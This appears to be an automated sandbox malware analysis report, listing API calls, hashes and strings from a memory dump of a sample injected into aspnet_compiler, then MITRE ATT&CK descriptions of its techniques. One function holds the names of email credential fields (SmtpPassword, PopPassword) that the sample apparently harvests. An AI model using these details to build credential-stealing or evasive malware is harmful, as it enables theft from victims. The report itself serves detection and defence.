send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
PopServer, xrefs: 0040D099
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
PopPort, xrefs: 0040D0A7
SmtpServer, xrefs: 0040D0DC
PopAccount, xrefs: 0040D0B6
EmailAddress, xrefs: 0040D074

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040549C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Function 004029D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

